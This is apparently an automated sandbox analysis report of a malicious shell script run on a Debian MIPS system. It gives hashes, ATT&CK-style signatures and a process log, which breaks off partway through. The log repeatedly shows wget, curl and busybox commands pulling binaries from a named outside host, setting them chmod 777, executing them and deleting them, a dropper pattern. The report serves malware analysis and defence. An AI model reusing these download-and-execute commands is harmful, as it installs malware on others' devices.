f17cea221ddb2e9cb9b9a660c58cd05b0211a349c1c0dcd4cdcadd2eb75c087d

Analysis

max time kernel
96s
max time network
98s
platform
debian-9_mips
resource
debian9-mipsbe-20240729-en
resource tags

arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
19/11/2024, 13:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f17cea221ddb2e9cb9b9a660c58cd05b0211a349c1c0dcd4cdcadd2eb75c087d.sh
Size

10KB
MD5

4bd7ef693d5e4059248bed47be72d877
SHA1

5568e10021be5534a2e6ad6cc0454f324cc288cc
SHA256

f17cea221ddb2e9cb9b9a660c58cd05b0211a349c1c0dcd4cdcadd2eb75c087d
SHA512

9a74b1016c0c85ed7483e942cfe6cf7ebc2c41915ca7610cc3f5d42cd84323d3323e8d34d82a08f58b0ba68c0fb751dcc8a0a22b0f73f6b83c4883fcaad4ade3
SSDEEP

96:Yws9UYtePAeP8eP6PRPxPCgcSLkJGHxpLILi6EnBCIE0Luexfufeftsu9NLNNVDq:L37iJZDAMI0j9BldV37iJZSxG

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
873	chmod
880	chmod
922	chmod
964	chmod
957	chmod
1023	chmod
762	chmod
887	chmod
908	chmod
915	chmod
971	chmod
999	chmod
943	chmod
978	chmod
753	chmod
792	chmod
894	chmod
992	chmod
818	chmod
1009	chmod
856	chmod
901	chmod
929	chmod
936	chmod
950	chmod
829	chmod
985	chmod
1016	chmod

Executes dropped EXE 28 IoCs

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 64 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
759	busybox
891	curl
960	wget
988	wget
1013	curl
900	busybox
932	wget
1019	wget
949	busybox
954	curl
970	busybox
822	wget
832	wget
851	busybox
886	busybox
942	busybox
730	wget
757	curl
778	curl
977	busybox
1020	curl
940	curl
956	busybox
974	wget
816	busybox
838	curl
879	busybox
893	busybox
933	curl
975	curl
877	curl
1003	curl
926	curl
996	curl
1015	busybox
788	busybox
890	wget
907	busybox
912	curl
925	wget
897	wget
946	wget
961	curl
823	curl
981	wget
989	curl
1022	busybox
803	curl
921	busybox
953	wget
991	busybox
1006	busybox
883	wget
884	curl
904	wget
911	wget
998	busybox
984	busybox
740	curl
768	wget
868	curl
928	busybox
967	wget
752	busybox

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/XdcqiUifew2ZZsPc2LTr3prXWRRto97HjC	curl
File opened for modification	/tmp/mStB1jIWmbweDTQgy7BvRSumadr3Ct4PlH	curl
File opened for modification	/tmp/1PnJdrAlVO5F1aDUkDyc3nZmH0YWkQlTju	curl
File opened for modification	/tmp/fatMVMsfukCyslF0uKqpgLL9qwQICbpBIS	curl
File opened for modification	/tmp/KCwEwU5T5Gtybmt4EvohtoURze2nwstkP9	curl
File opened for modification	/tmp/NZhzSm9xbpj22vxymb89qxhP3VkWOjwp3g	curl
File opened for modification	/tmp/n7z7bcQXGk067fv5GJBWKLcAwaTyb8CzmK	curl
File opened for modification	/tmp/LTll1cUdbkoBFEIy1SMQ8ls4xKcOTarmLc	curl
File opened for modification	/tmp/iqcP6nsHXHbALFr91KlxfTkWidZKebhqnU	curl
File opened for modification	/tmp/qeJBjGejXFWYkCo788vVihC3bRR1Cn93xu	curl
File opened for modification	/tmp/k51PeRNwgYJt7RoIQQcW2GcMgAu070mQFN	curl
File opened for modification	/tmp/iqcP6nsHXHbALFr91KlxfTkWidZKebhqnU	curl
File opened for modification	/tmp/NZhzSm9xbpj22vxymb89qxhP3VkWOjwp3g	curl
File opened for modification	/tmp/n7z7bcQXGk067fv5GJBWKLcAwaTyb8CzmK	curl
File opened for modification	/tmp/k51PeRNwgYJt7RoIQQcW2GcMgAu070mQFN	curl
File opened for modification	/tmp/qeJBjGejXFWYkCo788vVihC3bRR1Cn93xu	curl
File opened for modification	/tmp/SwT6vwRIXqKcLxsQacZS2nLCh7B1tl3KeM	curl
File opened for modification	/tmp/LTll1cUdbkoBFEIy1SMQ8ls4xKcOTarmLc	curl
File opened for modification	/tmp/KxoRyONtTLh4yhaVehdbgSr4ifUGPj3uUH	curl
File opened for modification	/tmp/SwT6vwRIXqKcLxsQacZS2nLCh7B1tl3KeM	curl
File opened for modification	/tmp/mStB1jIWmbweDTQgy7BvRSumadr3Ct4PlH	curl
File opened for modification	/tmp/KxoRyONtTLh4yhaVehdbgSr4ifUGPj3uUH	curl
File opened for modification	/tmp/fatMVMsfukCyslF0uKqpgLL9qwQICbpBIS	curl
File opened for modification	/tmp/XdcqiUifew2ZZsPc2LTr3prXWRRto97HjC	curl
File opened for modification	/tmp/KCwEwU5T5Gtybmt4EvohtoURze2nwstkP9	curl
File opened for modification	/tmp/FCM86A67mxbnuYGfekV430o6jmwGzedwYH	curl
File opened for modification	/tmp/FCM86A67mxbnuYGfekV430o6jmwGzedwYH	curl
File opened for modification	/tmp/1PnJdrAlVO5F1aDUkDyc3nZmH0YWkQlTju	curl

/tmp/f17cea221ddb2e9cb9b9a660c58cd05b0211a349c1c0dcd4cdcadd2eb75c087d.sh
/tmp/f17cea221ddb2e9cb9b9a660c58cd05b0211a349c1c0dcd4cdcadd2eb75c087d.sh
1⤵
PID:720
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:724
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/SwT6vwRIXqKcLxsQacZS2nLCh7B1tl3KeM
  2⤵
  - System Network Configuration Discovery
  PID:730
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/SwT6vwRIXqKcLxsQacZS2nLCh7B1tl3KeM
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:740
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/SwT6vwRIXqKcLxsQacZS2nLCh7B1tl3KeM
  2⤵
  - System Network Configuration Discovery
  PID:752
- /bin/chmod
  chmod 777 SwT6vwRIXqKcLxsQacZS2nLCh7B1tl3KeM
  2⤵
  - File and Directory Permissions Modification
  PID:753
- /tmp/SwT6vwRIXqKcLxsQacZS2nLCh7B1tl3KeM
  ./SwT6vwRIXqKcLxsQacZS2nLCh7B1tl3KeM
  2⤵
  - Executes dropped EXE
  PID:754
- /bin/rm
  rm SwT6vwRIXqKcLxsQacZS2nLCh7B1tl3KeM
  2⤵
  PID:755
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/LTll1cUdbkoBFEIy1SMQ8ls4xKcOTarmLc
  2⤵
  PID:756
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/LTll1cUdbkoBFEIy1SMQ8ls4xKcOTarmLc
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:757
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/LTll1cUdbkoBFEIy1SMQ8ls4xKcOTarmLc
  2⤵
  - System Network Configuration Discovery
  PID:759
- /bin/chmod
  chmod 777 LTll1cUdbkoBFEIy1SMQ8ls4xKcOTarmLc
  2⤵
  - File and Directory Permissions Modification
  PID:762
- /tmp/LTll1cUdbkoBFEIy1SMQ8ls4xKcOTarmLc
  ./LTll1cUdbkoBFEIy1SMQ8ls4xKcOTarmLc
  2⤵
  - Executes dropped EXE
  PID:763
- /bin/rm
  rm LTll1cUdbkoBFEIy1SMQ8ls4xKcOTarmLc
  2⤵
  PID:766
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/mStB1jIWmbweDTQgy7BvRSumadr3Ct4PlH
  2⤵
  - System Network Configuration Discovery
  PID:768
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/mStB1jIWmbweDTQgy7BvRSumadr3Ct4PlH
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:778
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/mStB1jIWmbweDTQgy7BvRSumadr3Ct4PlH
  2⤵
  - System Network Configuration Discovery
  PID:788
- /bin/chmod
  chmod 777 mStB1jIWmbweDTQgy7BvRSumadr3Ct4PlH
  2⤵
  - File and Directory Permissions Modification
  PID:792
- /tmp/mStB1jIWmbweDTQgy7BvRSumadr3Ct4PlH
  ./mStB1jIWmbweDTQgy7BvRSumadr3Ct4PlH
  2⤵
  - Executes dropped EXE
  PID:794
- /bin/rm
  rm mStB1jIWmbweDTQgy7BvRSumadr3Ct4PlH
  2⤵
  PID:795
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/1PnJdrAlVO5F1aDUkDyc3nZmH0YWkQlTju
  2⤵
  PID:796
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/1PnJdrAlVO5F1aDUkDyc3nZmH0YWkQlTju
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:803
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/1PnJdrAlVO5F1aDUkDyc3nZmH0YWkQlTju
  2⤵
  - System Network Configuration Discovery
  PID:816
- /bin/chmod
  chmod 777 1PnJdrAlVO5F1aDUkDyc3nZmH0YWkQlTju
  2⤵
  - File and Directory Permissions Modification
  PID:818
- /tmp/1PnJdrAlVO5F1aDUkDyc3nZmH0YWkQlTju
  ./1PnJdrAlVO5F1aDUkDyc3nZmH0YWkQlTju
  2⤵
  - Executes dropped EXE
  PID:819
- /bin/rm
  rm 1PnJdrAlVO5F1aDUkDyc3nZmH0YWkQlTju
  2⤵
  PID:821
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/XdcqiUifew2ZZsPc2LTr3prXWRRto97HjC
  2⤵
  - System Network Configuration Discovery
  PID:822
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/XdcqiUifew2ZZsPc2LTr3prXWRRto97HjC
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:823
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/XdcqiUifew2ZZsPc2LTr3prXWRRto97HjC
  2⤵
  PID:828
- /bin/chmod
  chmod 777 XdcqiUifew2ZZsPc2LTr3prXWRRto97HjC
  2⤵
  - File and Directory Permissions Modification
  PID:829
- /tmp/XdcqiUifew2ZZsPc2LTr3prXWRRto97HjC
  ./XdcqiUifew2ZZsPc2LTr3prXWRRto97HjC
  2⤵
  - Executes dropped EXE
  PID:830
- /bin/rm
  rm XdcqiUifew2ZZsPc2LTr3prXWRRto97HjC
  2⤵
  PID:831
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/NZhzSm9xbpj22vxymb89qxhP3VkWOjwp3g
  2⤵
  - System Network Configuration Discovery
  PID:832
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/NZhzSm9xbpj22vxymb89qxhP3VkWOjwp3g
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:838
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/NZhzSm9xbpj22vxymb89qxhP3VkWOjwp3g
  2⤵
  - System Network Configuration Discovery
  PID:851
- /bin/chmod
  chmod 777 NZhzSm9xbpj22vxymb89qxhP3VkWOjwp3g
  2⤵
  - File and Directory Permissions Modification
  PID:856
- /tmp/NZhzSm9xbpj22vxymb89qxhP3VkWOjwp3g
  ./NZhzSm9xbpj22vxymb89qxhP3VkWOjwp3g
  2⤵
  - Executes dropped EXE
  PID:857
- /bin/rm
  rm NZhzSm9xbpj22vxymb89qxhP3VkWOjwp3g
  2⤵
  PID:860
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/n7z7bcQXGk067fv5GJBWKLcAwaTyb8CzmK
  2⤵
  PID:862
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/n7z7bcQXGk067fv5GJBWKLcAwaTyb8CzmK
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:868
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/n7z7bcQXGk067fv5GJBWKLcAwaTyb8CzmK
  2⤵
  PID:872
- /bin/chmod
  chmod 777 n7z7bcQXGk067fv5GJBWKLcAwaTyb8CzmK
  2⤵
  - File and Directory Permissions Modification
  PID:873
- /tmp/n7z7bcQXGk067fv5GJBWKLcAwaTyb8CzmK
  ./n7z7bcQXGk067fv5GJBWKLcAwaTyb8CzmK
  2⤵
  - Executes dropped EXE
  PID:874
- /bin/rm
  rm n7z7bcQXGk067fv5GJBWKLcAwaTyb8CzmK
  2⤵
  PID:875
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/KxoRyONtTLh4yhaVehdbgSr4ifUGPj3uUH
  2⤵
  PID:876
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/KxoRyONtTLh4yhaVehdbgSr4ifUGPj3uUH
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:877
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/KxoRyONtTLh4yhaVehdbgSr4ifUGPj3uUH
  2⤵
  - System Network Configuration Discovery
  PID:879
- /bin/chmod
  chmod 777 KxoRyONtTLh4yhaVehdbgSr4ifUGPj3uUH
  2⤵
  - File and Directory Permissions Modification
  PID:880
- /tmp/KxoRyONtTLh4yhaVehdbgSr4ifUGPj3uUH
  ./KxoRyONtTLh4yhaVehdbgSr4ifUGPj3uUH
  2⤵
  - Executes dropped EXE
  PID:881
- /bin/rm
  rm KxoRyONtTLh4yhaVehdbgSr4ifUGPj3uUH
  2⤵
  PID:882
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/iqcP6nsHXHbALFr91KlxfTkWidZKebhqnU
  2⤵
  - System Network Configuration Discovery
  PID:883
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/iqcP6nsHXHbALFr91KlxfTkWidZKebhqnU
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:884
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/iqcP6nsHXHbALFr91KlxfTkWidZKebhqnU
  2⤵
  - System Network Configuration Discovery
  PID:886
- /bin/chmod
  chmod 777 iqcP6nsHXHbALFr91KlxfTkWidZKebhqnU
  2⤵
  - File and Directory Permissions Modification
  PID:887
- /tmp/iqcP6nsHXHbALFr91KlxfTkWidZKebhqnU
  ./iqcP6nsHXHbALFr91KlxfTkWidZKebhqnU
  2⤵
  - Executes dropped EXE
  PID:888
- /bin/rm
  rm iqcP6nsHXHbALFr91KlxfTkWidZKebhqnU
  2⤵
  PID:889
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/fatMVMsfukCyslF0uKqpgLL9qwQICbpBIS
  2⤵
  - System Network Configuration Discovery
  PID:890
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/fatMVMsfukCyslF0uKqpgLL9qwQICbpBIS
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:891
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/fatMVMsfukCyslF0uKqpgLL9qwQICbpBIS
  2⤵
  - System Network Configuration Discovery
  PID:893
- /bin/chmod
  chmod 777 fatMVMsfukCyslF0uKqpgLL9qwQICbpBIS
  2⤵
  - File and Directory Permissions Modification
  PID:894
- /tmp/fatMVMsfukCyslF0uKqpgLL9qwQICbpBIS
  ./fatMVMsfukCyslF0uKqpgLL9qwQICbpBIS
  2⤵
  - Executes dropped EXE
  PID:895
- /bin/rm
  rm fatMVMsfukCyslF0uKqpgLL9qwQICbpBIS
  2⤵
  PID:896
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/qeJBjGejXFWYkCo788vVihC3bRR1Cn93xu
  2⤵
  - System Network Configuration Discovery
  PID:897
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/qeJBjGejXFWYkCo788vVihC3bRR1Cn93xu
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:898
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/qeJBjGejXFWYkCo788vVihC3bRR1Cn93xu
  2⤵
  - System Network Configuration Discovery
  PID:900
- /bin/chmod
  chmod 777 qeJBjGejXFWYkCo788vVihC3bRR1Cn93xu
  2⤵
  - File and Directory Permissions Modification
  PID:901
- /tmp/qeJBjGejXFWYkCo788vVihC3bRR1Cn93xu
  ./qeJBjGejXFWYkCo788vVihC3bRR1Cn93xu
  2⤵
  - Executes dropped EXE
  PID:902
- /bin/rm
  rm qeJBjGejXFWYkCo788vVihC3bRR1Cn93xu
  2⤵
  PID:903
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/KCwEwU5T5Gtybmt4EvohtoURze2nwstkP9
  2⤵
  - System Network Configuration Discovery
  PID:904
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/KCwEwU5T5Gtybmt4EvohtoURze2nwstkP9
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:905
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/KCwEwU5T5Gtybmt4EvohtoURze2nwstkP9
  2⤵
  - System Network Configuration Discovery
  PID:907
- /bin/chmod
  chmod 777 KCwEwU5T5Gtybmt4EvohtoURze2nwstkP9
  2⤵
  - File and Directory Permissions Modification
  PID:908
- /tmp/KCwEwU5T5Gtybmt4EvohtoURze2nwstkP9
  ./KCwEwU5T5Gtybmt4EvohtoURze2nwstkP9
  2⤵
  - Executes dropped EXE
  PID:909
- /bin/rm
  rm KCwEwU5T5Gtybmt4EvohtoURze2nwstkP9
  2⤵
  PID:910
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/k51PeRNwgYJt7RoIQQcW2GcMgAu070mQFN
  2⤵
  - System Network Configuration Discovery
  PID:911
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/k51PeRNwgYJt7RoIQQcW2GcMgAu070mQFN
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:912
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/k51PeRNwgYJt7RoIQQcW2GcMgAu070mQFN
  2⤵
  PID:914
- /bin/chmod
  chmod 777 k51PeRNwgYJt7RoIQQcW2GcMgAu070mQFN
  2⤵
  - File and Directory Permissions Modification
  PID:915
- /tmp/k51PeRNwgYJt7RoIQQcW2GcMgAu070mQFN
  ./k51PeRNwgYJt7RoIQQcW2GcMgAu070mQFN
  2⤵
  - Executes dropped EXE
  PID:916
- /bin/rm
  rm k51PeRNwgYJt7RoIQQcW2GcMgAu070mQFN
  2⤵
  PID:917
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/FCM86A67mxbnuYGfekV430o6jmwGzedwYH
  2⤵
  PID:918
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/FCM86A67mxbnuYGfekV430o6jmwGzedwYH
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:919
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/FCM86A67mxbnuYGfekV430o6jmwGzedwYH
  2⤵
  - System Network Configuration Discovery
  PID:921
- /bin/chmod
  chmod 777 FCM86A67mxbnuYGfekV430o6jmwGzedwYH
  2⤵
  - File and Directory Permissions Modification
  PID:922
- /tmp/FCM86A67mxbnuYGfekV430o6jmwGzedwYH
  ./FCM86A67mxbnuYGfekV430o6jmwGzedwYH
  2⤵
  - Executes dropped EXE
  PID:923
- /bin/rm
  rm FCM86A67mxbnuYGfekV430o6jmwGzedwYH
  2⤵
  PID:924
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/fatMVMsfukCyslF0uKqpgLL9qwQICbpBIS
  2⤵
  - System Network Configuration Discovery
  PID:925
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/fatMVMsfukCyslF0uKqpgLL9qwQICbpBIS
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:926
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/fatMVMsfukCyslF0uKqpgLL9qwQICbpBIS
  2⤵
  - System Network Configuration Discovery
  PID:928
- /bin/chmod
  chmod 777 fatMVMsfukCyslF0uKqpgLL9qwQICbpBIS
  2⤵
  - File and Directory Permissions Modification
  PID:929
- /tmp/fatMVMsfukCyslF0uKqpgLL9qwQICbpBIS
  ./fatMVMsfukCyslF0uKqpgLL9qwQICbpBIS
  2⤵
  - Executes dropped EXE
  PID:930
- /bin/rm
  rm fatMVMsfukCyslF0uKqpgLL9qwQICbpBIS
  2⤵
  PID:931
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/FCM86A67mxbnuYGfekV430o6jmwGzedwYH
  2⤵
  - System Network Configuration Discovery
  PID:932
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/FCM86A67mxbnuYGfekV430o6jmwGzedwYH
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:933
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/FCM86A67mxbnuYGfekV430o6jmwGzedwYH
  2⤵
  PID:935
- /bin/chmod
  chmod 777 FCM86A67mxbnuYGfekV430o6jmwGzedwYH
  2⤵
  - File and Directory Permissions Modification
  PID:936
- /tmp/FCM86A67mxbnuYGfekV430o6jmwGzedwYH
  ./FCM86A67mxbnuYGfekV430o6jmwGzedwYH
  2⤵
  - Executes dropped EXE
  PID:937
- /bin/rm
  rm FCM86A67mxbnuYGfekV430o6jmwGzedwYH
  2⤵
  PID:938
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/qeJBjGejXFWYkCo788vVihC3bRR1Cn93xu
  2⤵
  PID:939
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/qeJBjGejXFWYkCo788vVihC3bRR1Cn93xu
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:940
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/qeJBjGejXFWYkCo788vVihC3bRR1Cn93xu
  2⤵
  - System Network Configuration Discovery
  PID:942
- /bin/chmod
  chmod 777 qeJBjGejXFWYkCo788vVihC3bRR1Cn93xu
  2⤵
  - File and Directory Permissions Modification
  PID:943
- /tmp/qeJBjGejXFWYkCo788vVihC3bRR1Cn93xu
  ./qeJBjGejXFWYkCo788vVihC3bRR1Cn93xu
  2⤵
  - Executes dropped EXE
  PID:944
- /bin/rm
  rm qeJBjGejXFWYkCo788vVihC3bRR1Cn93xu
  2⤵
  PID:945
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/KCwEwU5T5Gtybmt4EvohtoURze2nwstkP9
  2⤵
  - System Network Configuration Discovery
  PID:946
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/KCwEwU5T5Gtybmt4EvohtoURze2nwstkP9
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:947
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/KCwEwU5T5Gtybmt4EvohtoURze2nwstkP9
  2⤵
  - System Network Configuration Discovery
  PID:949
- /bin/chmod
  chmod 777 KCwEwU5T5Gtybmt4EvohtoURze2nwstkP9
  2⤵
  - File and Directory Permissions Modification
  PID:950
- /tmp/KCwEwU5T5Gtybmt4EvohtoURze2nwstkP9
  ./KCwEwU5T5Gtybmt4EvohtoURze2nwstkP9
  2⤵
  - Executes dropped EXE
  PID:951
- /bin/rm
  rm KCwEwU5T5Gtybmt4EvohtoURze2nwstkP9
  2⤵
  PID:952
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/k51PeRNwgYJt7RoIQQcW2GcMgAu070mQFN
  2⤵
  - System Network Configuration Discovery
  PID:953
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/k51PeRNwgYJt7RoIQQcW2GcMgAu070mQFN
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:954
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/k51PeRNwgYJt7RoIQQcW2GcMgAu070mQFN
  2⤵
  - System Network Configuration Discovery
  PID:956
- /bin/chmod
  chmod 777 k51PeRNwgYJt7RoIQQcW2GcMgAu070mQFN
  2⤵
  - File and Directory Permissions Modification
  PID:957
- /tmp/k51PeRNwgYJt7RoIQQcW2GcMgAu070mQFN
  ./k51PeRNwgYJt7RoIQQcW2GcMgAu070mQFN
  2⤵
  - Executes dropped EXE
  PID:958
- /bin/rm
  rm k51PeRNwgYJt7RoIQQcW2GcMgAu070mQFN
  2⤵
  PID:959
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/1PnJdrAlVO5F1aDUkDyc3nZmH0YWkQlTju
  2⤵
  - System Network Configuration Discovery
  PID:960
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/1PnJdrAlVO5F1aDUkDyc3nZmH0YWkQlTju
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:961
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/1PnJdrAlVO5F1aDUkDyc3nZmH0YWkQlTju
  2⤵
  PID:963
- /bin/chmod
  chmod 777 1PnJdrAlVO5F1aDUkDyc3nZmH0YWkQlTju
  2⤵
  - File and Directory Permissions Modification
  PID:964
- /tmp/1PnJdrAlVO5F1aDUkDyc3nZmH0YWkQlTju
  ./1PnJdrAlVO5F1aDUkDyc3nZmH0YWkQlTju
  2⤵
  - Executes dropped EXE
  PID:965
- /bin/rm
  rm 1PnJdrAlVO5F1aDUkDyc3nZmH0YWkQlTju
  2⤵
  PID:966
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/XdcqiUifew2ZZsPc2LTr3prXWRRto97HjC
  2⤵
  - System Network Configuration Discovery
  PID:967
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/XdcqiUifew2ZZsPc2LTr3prXWRRto97HjC
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:968
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/XdcqiUifew2ZZsPc2LTr3prXWRRto97HjC
  2⤵
  - System Network Configuration Discovery
  PID:970
- /bin/chmod
  chmod 777 XdcqiUifew2ZZsPc2LTr3prXWRRto97HjC
  2⤵
  - File and Directory Permissions Modification
  PID:971
- /tmp/XdcqiUifew2ZZsPc2LTr3prXWRRto97HjC
  ./XdcqiUifew2ZZsPc2LTr3prXWRRto97HjC
  2⤵
  - Executes dropped EXE
  PID:972
- /bin/rm
  rm XdcqiUifew2ZZsPc2LTr3prXWRRto97HjC
  2⤵
  PID:973
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/SwT6vwRIXqKcLxsQacZS2nLCh7B1tl3KeM
  2⤵
  - System Network Configuration Discovery
  PID:974
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/SwT6vwRIXqKcLxsQacZS2nLCh7B1tl3KeM
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:975
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/SwT6vwRIXqKcLxsQacZS2nLCh7B1tl3KeM
  2⤵
  - System Network Configuration Discovery
  PID:977
- /bin/chmod
  chmod 777 SwT6vwRIXqKcLxsQacZS2nLCh7B1tl3KeM
  2⤵
  - File and Directory Permissions Modification
  PID:978
- /tmp/SwT6vwRIXqKcLxsQacZS2nLCh7B1tl3KeM
  ./SwT6vwRIXqKcLxsQacZS2nLCh7B1tl3KeM
  2⤵
  - Executes dropped EXE
  PID:979
- /bin/rm
  rm SwT6vwRIXqKcLxsQacZS2nLCh7B1tl3KeM
  2⤵
  PID:980
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/LTll1cUdbkoBFEIy1SMQ8ls4xKcOTarmLc
  2⤵
  - System Network Configuration Discovery
  PID:981
- /usr/bin/curl
